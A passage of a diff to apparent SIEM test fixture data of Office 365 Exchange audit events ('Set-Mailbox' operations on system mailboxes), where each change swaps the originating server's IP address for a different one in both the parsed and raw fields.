 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3522,7 +3522,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3534,7 +3534,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3608,7 +3608,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3620,7 +3620,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3694,7 +3694,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3706,7 +3706,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3780,7 +3780,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3792,7 +3792,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3866,7 +3866,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3878,7 +3878,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3952,7 +3952,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 